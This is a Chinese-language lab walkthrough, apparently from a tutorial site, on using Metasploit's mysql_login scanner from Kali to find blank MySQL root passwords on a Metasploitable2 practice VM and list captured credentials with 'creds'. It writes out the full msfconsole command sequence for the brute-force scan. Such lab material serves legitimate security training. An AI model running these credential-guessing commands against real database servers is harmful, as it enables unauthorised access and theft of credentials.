实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码

2022/1/23 19:06:21

本文主要是介绍实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

系列文章目录

实战篇 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码


文章目录

  • 系列文章目录
  • 前言
  • 一、实验环境
  • 二、实验步骤
    • 1.kali 启动数据库进入 msf 搜索模块
    • 2.加载模块,配置并设置参数
    • 3.配置完成后执行 run 或者 exploit
    • 4.使用后端凭证命令 creds, 列出数据库中的所有凭证


前言

        metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。与VMWare、VirtualBox和其他常见的虚拟化平台兼容。

        Metasploitable 默认 用户名:msfadmin, 密码:msfadmin。登陆之后使用 ip addr 可查看 ip 地址。(查看 IP 的命令很多)

有些新手学了点皮毛耗费大量时间自己去找 IP 做测试,这不仅浪费大量时间,而且很容易被请去小黑屋,有这样一个练手的环境直接去干挺好的,安装靶机也不难,省时省力只是占点内存,网上安装教程也很多。


一、实验环境

一台 Kali - Linux 和 一台 Metasploitable2-Linux 靶机。

我的靶机网络模式设置的是桥接(VMnet0)模式。

二、实验步骤

# 启动数据库:

root@kali:~# systemctl start postgresql

root@kali:~# systemctl enable postgresql #设置成开机启动数据库,我们要经常用

1. kali 启动数据库进入 msf 搜索模块

msfconsole

search mysql_login

2. 加载模块, 配置并设置参数

use auxiliary/scanner/mysql/mysql_login

set rhosts 目标主机IP

set username root    #我们配置要爆破的用户

set blank_passwords true    #开启为所有用户尝试空密码 

show options

3. 配置完成后执行 run  或者 exploit

4. 使用后端凭证命令 creds,列出数据库中的所有凭据

creds

注:如果creds出现错误,可能是postgresql未开启!

例如:

即无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接



这篇关于实战篇01 - 使用 Linux-msf 扫描 metasploitable2 靶机上MySQL服务的空密码的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程